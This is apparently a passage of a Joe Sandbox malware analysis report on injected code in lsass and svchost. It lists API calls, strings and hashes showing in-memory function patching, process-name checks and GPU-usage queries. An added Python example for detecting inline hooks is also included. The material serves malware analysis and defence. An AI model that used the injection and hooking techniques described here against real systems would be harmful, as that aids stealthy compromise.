                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: `vector constructor iterator'$ctor closure'
                                                                  • API String ID: 592178966-3792692944
                                                                  • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction ID: 08d77e98046bf456f4cc7ff47bd697112ef962ad073d7842f594a56ce69dc36f
                                                                  • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction Fuzzy Hash: 5AE08661641B44D0EF018F35E4C829C37A0DB59B54B4A91239A5C06312FA38D1EDC300
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: ctor closure'$destructor iterator'
                                                                  • API String ID: 592178966-595914035
                                                                  • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction ID: c62a53234f056fb7875f4dd43f552bdaaea83cda8922a931c84352274bd2d7c4
                                                                  • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction Fuzzy Hash: 2CE08CA1A01B48C0EF028F35E4C829C3760EB68B58B8A91239A5C06312EA38D1E9C300
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                  • String ID: `scalar deleting destructor'$rFeaturePresent
                                                                  • API String ID: 1875163511-1689945142
                                                                  • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction ID: 21612ab5ec52f5ab15ccd92b75c0beb28af2a9aee30857cc7ba07a4efd239e18
                                                                  • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction Fuzzy Hash: 0DD06762211B84D5FE10EB14D8CD39D6334F394308FA25413924D41976DF6DCA9EC750
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 756756679-0
                                                                  • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction ID: 2908ed8c70ef6e53478651d64cf568e0e4b32d4df27596df8a614dfe14158e8e
                                                                  • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction Fuzzy Hash: 12116D22A01B90C1FA04CB67A48C21D67A5F7C9FD0F6A4126DF8D93736DF39D85A8304
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction ID: 57c18ebde478ef601b860432b04afcda540ff4a480a4db4bad1cccaa4c908e69
                                                                  • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction Fuzzy Hash: DFE03932601700C6F7048B62D84C349B7E5EB88B06F0681268A0907362DF7E889D8740
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                   • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction ID: a6544d1a82574b1944e5995cc7c7424303f1f11fc498c1c946bd232dd240e5a6
                                                                  • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction Fuzzy Hash: 59E0E572611B40C6F7089B62D84C35DB7A5FB88B16F4A8126CA0907322EF3A889D8A14

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32 ref: 000002A661303639
                                                                  • PathFindFileNameW.SHLWAPI ref: 000002A661303648
                                                                    • Part of subcall function 000002A661303C74: StrCmpNIW.KERNELBASE(?,?,?,000002A66130254B), ref: 000002A661303C8C
                                                                    • Part of subcall function 000002A661303BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002A66130365F), ref: 000002A661303BCE
                                                                    • Part of subcall function 000002A661303BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A66130365F), ref: 000002A661303BFC
                                                                    • Part of subcall function 000002A661303BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A66130365F), ref: 000002A661303C1E
                                                                    • Part of subcall function 000002A661303BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A66130365F), ref: 000002A661303C39
                                                                    • Part of subcall function 000002A661303BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A66130365F), ref: 000002A661303C5A
                                                                  • CreateThread.KERNELBASE ref: 000002A66130368F
                                                                    • Part of subcall function 000002A661301D40: GetCurrentThread.KERNEL32 ref: 000002A661301D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                   • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                  • String ID:
                                                                  • API String ID: 1683269324-0
                                                                  • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction ID: 6d527c4ffa2a22615c6c3880684768457c7209d08e3767d179ae56948d6c0f44
                                                                  • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction Fuzzy Hash: 43119270F20A048BFB60EB61AD4DB5A22DCB797F1AF4C41259507A3695DF7CC04C8A83

                                                                   Control-flow Graph (rendered as an image in the report; legend: Executed / Not Executed, block colouring not preserved in text; blocks and edges recovered from the graph text)
                                                                   • Block 18: 2a661303c74-2a661303c7f (entry) -> 19, 20
                                                                   • Block 20: 2a661303c81-2a661303c94, calls StrCmpNIW -> 19, 21
                                                                   • Block 21: 2a661303c96 -> 19
                                                                   • Block 19: 2a661303c99-2a661303ca0 (exit)
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                   • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: dialer
                                                                  • API String ID: 0-3528709123
                                                                  • Opcode ID: 97321a65610e08eab14ba81d351fc46d427cdee9015788b38818b6b16ac0c562
                                                                  • Instruction ID: 01bc0c9df650b7303412c68f3f44326fa99728fe152795615fbb60613f06fa31
                                                                  • Opcode Fuzzy Hash: 97321a65610e08eab14ba81d351fc46d427cdee9015788b38818b6b16ac0c562
                                                                  • Instruction Fuzzy Hash: 7DD0A7A0B116458BFF24DFE288CDA603398DB0AF05F8D4029C90253110DF2D898D8711
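The API sequence in the svchost-hosted function above (GetModuleFileNameW, PathFindFileNameW, a StrCmpNIW subcall, then GetModuleHandleW, GetCurrentProcess and two VirtualProtectEx calls before CreateThread), together with the string `dialer` in the StrCmpNIW helper whose graph is shown directly above, is consistent with injected code that first checks the image name of the process it is running in and then patches a function in an already-loaded module: the first VirtualProtectEx makes the target page writable, the detour is written over the prolog, and the second VirtualProtectEx restores the original protection. Because protection is restored, looking at page permissions afterwards shows nothing; the reliable check is to compare the first bytes of each function against the clean image. The following Python is an added example, not code from the report or from the analysed sample: it diffs a mapped prolog against its clean copy and decodes the three detour encodings hook libraries commonly emit. The prolog bytes, the function address `FUNC_VA` and the export names in the demo are constructed; a real scan would read the live bytes with ReadProcessMemory and the clean bytes from the file mapped at the same base, with relocations applied.

```python
"""Inline-hook check: diff a function prolog mapped in a live process against the
clean bytes of the same function from the on-disk image, and decode the detour.

Added example for this report; not code from the report or from the analysed
sample.  All prolog bytes, addresses and export names below are constructed."""
import struct
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

PROLOG_LEN = 16   # bytes compared per function; covers every common trampoline


@dataclass
class HookVerdict:
    hooked: bool
    kind: str               # "none", "jmp_rel32", "mov_rax_jmp", "push_ret" or "patched"
    target: Optional[int]   # where the detour transfers control, when decodable
    offset: int             # first byte that differs from the clean prolog, -1 if none


def decode_detour(code: bytes, va: int) -> Tuple[str, Optional[int]]:
    """Classify the patch at `code` (mapped at virtual address `va`) and recover
    its destination for the three encodings hook libraries normally emit."""
    # E9 rel32            jmp rel32, 5 bytes: target = next instruction + rel32
    if len(code) >= 5 and code[0] == 0xE9:
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp_rel32", (va + 5 + rel) & 0xFFFFFFFFFFFFFFFF
    # 48 B8 imm64 FF E0   mov rax, imm64 ; jmp rax, 12 bytes: x64 absolute detour
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov_rax_jmp", struct.unpack_from("<Q", code, 2)[0]
    # 68 imm32 C3         push imm32 ; ret, 6 bytes: 32-bit absolute detour
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        return "push_ret", struct.unpack_from("<I", code, 1)[0]
    return "patched", None


def check_prolog(clean: bytes, live: bytes, va: int) -> HookVerdict:
    """Report the first divergence between the clean and the live prolog.
    Relocation fix-ups do not land in the first instructions of a normal
    prolog, so a raw byte compare is safe here; bytes further into the body
    must be relocated before comparing."""
    n = min(len(clean), len(live), PROLOG_LEN)
    for i in range(n):
        if clean[i] != live[i]:
            kind, target = decode_detour(live[i:], va + i)
            return HookVerdict(True, kind, target, i)
    return HookVerdict(False, "none", None, -1)


def scan(table: Dict[str, Tuple[bytes, bytes, int]]) -> Dict[str, HookVerdict]:
    """Run check_prolog over {name: (clean_prolog, live_prolog, va)} and keep
    only the entries that turned out to be hooked."""
    found = {}
    for name, (clean, live, va) in table.items():
        verdict = check_prolog(clean, live, va)
        if verdict.hooked:
            found[name] = verdict
    return found


# ---- constructed test data (not taken from the sample) -----------------------
# Shape of an x64 ntdll syscall stub prolog: mov r10,rcx ; mov eax,imm32 ; test ...
CLEAN = bytes.fromhex("4c8bd1b836000000f604250803fe7f01")
FUNC_VA = 0x00007FFE12345670          # assumed mapping address for the stub


def hooked_jmp_rel32(target: int) -> bytes:
    """Prolog after a 5-byte jmp rel32 detour was written over it."""
    rel = (target - (FUNC_VA + 5)) & 0xFFFFFFFF
    return b"\xE9" + struct.pack("<I", rel) + CLEAN[5:]


def hooked_mov_rax(target: int) -> bytes:
    """Prolog after a 12-byte mov rax,imm64 ; jmp rax detour was written over it."""
    return b"\x48\xB8" + struct.pack("<Q", target) + b"\xFF\xE0" + CLEAN[12:]


if __name__ == "__main__":
    table = {
        "NtQuerySystemInformation": (CLEAN, hooked_jmp_rel32(0x00007FFE12300000), FUNC_VA),
        "NtQueryDirectoryFile":     (CLEAN, hooked_mov_rax(0x000001FE00001000), FUNC_VA),
        "NtClose":                  (CLEAN, CLEAN, FUNC_VA),
    }
    for name, v in scan(table).items():
        tgt = f"{v.target:#x}" if v.target is not None else "?"
        print(f"{name}: {v.kind} at +{v.offset} -> {tgt}")
```

A divergence is a lead, not a verdict: EDR agents and some legitimate applications also hook these exports, so correlate the detour target with the module that owns it (a target inside an unbacked region, or inside a module that is not on disk, is the interesting case). The check only sees prolog patches; hooks installed by overwriting the IAT or EAT need a separate pointer comparison.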
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction ID: 0824defc401c60810ac4f1cae9b4f1747633b09fd72c8282fbd3eb058abddc85
                                                                  • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction Fuzzy Hash: 6491FFB2F0125087EB648F25D10CB6DB399FB56F94F598124DE0A4B788DF38E89AC701

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 000002A661301628: GetProcessHeap.KERNEL32 ref: 000002A661301633
                                                                    • Part of subcall function 000002A661301628: HeapAlloc.KERNEL32 ref: 000002A661301642
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016B2
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DF
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613016F9
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301719
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301734
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301754
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130176F
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130178F
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017AA
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017CA
                                                                  • SleepEx.KERNELBASE ref: 000002A661301AE3
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017E5
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301805
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301820
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301840
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130185B
                                                                    • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130187B
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301896
                                                                    • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613018A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                   • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                  • String ID:
                                                                  • API String ID: 948135145-0
                                                                  • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction ID: c5f4609d7a0ddf94ba0b255fe7b8c84c2027e9ba60fe4a7fa262d0ad67ab09e4
                                                                  • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction Fuzzy Hash: AD312871F10A0593FB50AB26D95C35A53FCAB86FCAF4C50219E0BA7795EF1CC45882D2
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID: destructor'$ned$restrict(
                                                                  • API String ID: 190073905-924718728
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: d8a3677eb0ab1bfc5ac1c63b2b99d00723214a86536ce85ca85354c68c7dac87
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 6E81A121F106818BFA549B65E88D399329DAF8BF88F5C4125E94983796DF3DC9CD8303

                                                                   Control-flow Graph (rendered as an image in the report; legend: Executed / Not Executed, block colouring not preserved in text). Summary recovered from the graph text: 33 basic blocks; entry block 2a66130d258-2a66130d27a calls GetLastError, the first FlsGetValue/FlsSetValue cluster converges on the SetLastError block at 2a66130d305, which branches into a second FlsGetValue/FlsSetValue cluster from 2a66130d325 onward; allocation and free paths call 2a66130dafc, 2a66130db74, 2a66130cfc4 and 2a66130cb78; the function exits at 2a66130d312, 2a66130d3bf and 2a66130d3c8.
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D267
                                                                  • FlsGetValue.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D27C
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D29D
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D2CA
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D2DB
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D2EC
                                                                  • SetLastError.KERNEL32(?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D307
                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D33D
                                                                  • FlsSetValue.KERNEL32(?,?,00000001,000002A66130F0FC,?,?,?,?,000002A66130C3CF,?,?,?,?,?,000002A661307EE0), ref: 000002A66130D35C
                                                                    • Part of subcall function 000002A66130DAFC: HeapAlloc.KERNEL32(?,?,00000000,000002A66130D432,?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130DB51
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D384
                                                                    • Part of subcall function 000002A66130DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002A66130643A), ref: 000002A66130DB8A
                                                                    • Part of subcall function 000002A66130DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002A66130643A), ref: 000002A66130DB94
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D395
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A661310E9B,?,?,?,000002A66131088C,?,?,?,000002A66130CC7F), ref: 000002A66130D3A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                   • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 570795689-0
                                                                  • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction ID: 8265c23a4ccf136d65ec441aeaaa312edad24db801d5ca1131a419eed8c37940
                                                                  • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction Fuzzy Hash: 3A418A20F0168443FA58A335555D36E22DE5B4BFB2F1C4728AD372B7D6DF2C844A8687

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                   • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                  • API String ID: 1943346504-1805530042
                                                                  • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction ID: 5c55e335d4956d0e116a84cf8c0a623a6748ba139191798feb857f98657cbe97
                                                                  • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction Fuzzy Hash: AC318072F00A808BF720DF62A80C759B3A4F78AF96F4845259E4B63A65DF7CC45D8781
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction ID: fa2c83ff83d554cdffb8e1bf8d61ac0f573b740e624b4cb83b305fbf64bdb7eb
                                                                  • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction Fuzzy Hash: 82E16932F04B808BEB209B65D44C79D37ACFB46B98F184515EE8957B99CF38C598C702

                                                                  Control-flow Graph (graph rendering omitted; the function calls LoadLibraryExW, GetLastError, FreeLibrary and GetProcAddress)
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
